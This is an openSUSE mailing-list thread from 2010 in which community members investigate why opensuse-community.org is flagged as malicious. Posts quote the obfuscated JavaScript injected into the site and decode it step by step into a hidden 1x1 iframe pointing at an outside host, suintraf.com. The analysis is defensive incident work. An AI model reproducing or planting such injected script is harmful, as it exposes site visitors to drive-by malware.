[opensuse-project] openuse-community.org is a bad website
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 According to firefox/google, opensuse-community.org is a bad website... anything we can do?? Andrea - -- - ------------------------------------------ Andrea Florio QSI International School of Brindisi Sys Admin CISCO CCNA Certified openSUSE-Education Administrator openSUSE Official Member (anubisg1) Email: andrea@opensuse.org Packman Packaging Team Email: andrea@links2linux.de Web: http://packman.links2linux.org/ Cell: +39-328-7365667 - ------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.15 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/ iEYEARECAAYFAkwsvvwACgkQyCZT87TFPuhOuwCg3hAyJXmVK8dHBDxBzXvQy78P WtAAoNoUxfA84RNydki3h6pz9+yCIhdF =x+Wd -----END PGP SIGNATURE----- -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
On Thu, 2010-07-01 at 18:14 +0200, Andrea Florio wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
Andrea
- -- - ------------------------------------------ Andrea Florio
Care to explain more than just a simple line like that? What is it saying? Bryen -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
On 07/01/2010 09:50 PM, Bryen M. Yunashko wrote:
On Thu, 2010-07-01 at 18:14 +0200, Andrea Florio wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
Andrea
- -- - ------------------------------------------ Andrea Florio
Care to explain more than just a simple line like that? What is it saying?
Bryen
Check this - http://www.google.co.in/interstitial?url=http://opensuse-community.org/ -- Regards SJ (Shayon) openSUSE Member http://en.opensuse.org/User:wwarlock http://shayonj.wordpress.com/ -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
On Thu, 01 Jul 2010 21:54:39 +0530 Shayon Mukherjee <sj@opensuse.org> wrote:
On 07/01/2010 09:50 PM, Bryen M. Yunashko wrote:
On Thu, 2010-07-01 at 18:14 +0200, Andrea Florio wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
Andrea
- -- - ------------------------------------------ Andrea Florio
Care to explain more than just a simple line like that? What is it saying?
Bryen
Check this - http://www.google.co.in/interstitial?url=http://opensuse-community.org/
Hi There is a thread here about it as well; http://forums.opensuse.org/english/get-help-here/hardware/441229-firefox-rep... AFAIK, it's being worked on to fix the issue. -- Cheers Malcolm °¿° (Linux Counter #276890) SUSE Linux Enterprise Desktop 11 (x86_64) Kernel 2.6.32.12-0.7-default up 5 days 23:49, 2 users, load average: 0.18, 0.11, 0.03 GPU GeForce 8600 GTS Silent - Driver Version: 256.35 -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
2010/7/1 Andrea Florio <andrea@opensuse.org>:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
The FAQ explains how it works: http://www.stopbadware.org/home/faq But it's my understanding that it has already been reported: http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47 -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio <andrea@opensuse.org>:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
The FAQ explains how it works: http://www.stopbadware.org/home/faq
But it's my understanding that it has already been reported: http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47
curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less The very first line looks truly like malware: script language=JavaScript document.write(unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e')) Ciao, Marcus -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
On Thu, Jul 1, 2010 at 5:01 PM, Marcus Meissner <meissner@suse.de> wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio <andrea@opensuse.org>:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
The FAQ explains how it works: http://www.stopbadware.org/home/faq
But it's my understanding that it has already been reported: http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47
curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less
The very first line looks truly like malware:
script language=JavaScript document.write(unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e'))
Ciao, Marcus -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
Safe Browsing Diagnostic page for opensuse-community.org What is the current listing status for opensuse-community.org? Site is listed as suspicious - visiting this web site may harm your computer. Part of this site was listed for suspicious activity 2 time(s) over the past 90 days. What happened when Google visited this site? Of the 3 pages we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-07-01, and the last time suspicious content was found on this site was on 2010-07-01. Malicious software is hosted on 1 domain(s), including suintraf.com/. This site was hosted on 2 network(s) including AS26347 (DREAMHOST), AS24940 (HETZNER). Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, opensuse-community.org did not appear to function as an intermediary for the infection of any sites. Has this site hosted malware? No, this site has not hosted malicious software over the past 90 days. How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. Next steps: * Return to the previous page. * If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. -- ----------------------------------------- Discover it! Enjoy it! Share it! openSUSE Linux. ----------------------------------------- openSUSE -- en.opensuse.org/User:Terrorpup openSUSE Ambassador/openSUSE Member skype,twiiter,identica,friendfeed -- terrorpup freenode(irc) --terrorpup/lupinstein Have you tried SUSE Studio? Need to create a Live CD, an app you want to package and distribute , or create your own linux distro. Give SUSE Studio a try. www.susestudio.com. -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
Hello, On Thu, 01 Jul 2010, Marcus Meissner wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio <andrea@opensuse.org>:
Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
The FAQ explains how it works: http://www.stopbadware.org/home/faq
But it's my understanding that it has already been reported: http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47
curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less
The very first line looks truly like malware:
script language=JavaScript document.write(unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e'))
So it seems at a deeper look. $ jsshell js> unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e') <script language=JavaScript>document.write(unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0 %73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e'))</script> js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0 %73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e') <iframe width=1 height=1 border=0 frameborder=0 src='http://suintraf.com/top100/in.cgi?4'></iframe> js> So, it "injects" an "invisible" 1x1 iframe. The weird stuff is: http://suintraf.com/top100/in.cgi?4 redirects to linux.com, if you call it as a linux browser. But if you call it as e.g. an ie6, you get redirected to http://www.google.com/errors/asfe/system_down.html So, I guess depending on which browser you use (and whatever else) you could get redirected to a site where malware is, trying to be installed as drive-by-download or whatever. Anyway, JavaScript unescape orgies are always a bad sign. Please, tell the admins to reinstall from a clean source / backups. And webpin's index has been broken for quite a while anyway. -dnh PS: jsshell is part of libjs, no idea if oS/packman package it. -- [Stefan Wegmann sucht ein optisch ansprechendes Brennprogramm] Hhhhmmm, unter diesem Aspekt habe ich das ganze noch gar nicht betrachtet. Was würde denn Deinen gehobenen ästhetischen Ansprüchen entgegenkommen? Ein zartes Chartreuse im leicht fluffigen Kontrast zu einem frühlingshaften Ostereidottergelb? Mit Buttons im floralen Design und Chiffoneske Hilfsfenster mit einer luftig durchscheinenden Optik? [Thomas Templin in suse-linux] -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org
participants (8)
-
Andrea Florio -
Bryen M. Yunashko -
Chuck Payne -
Cristian Morales Vega -
David Haller -
Malcolm -
Marcus Meissner -
Shayon Mukherjee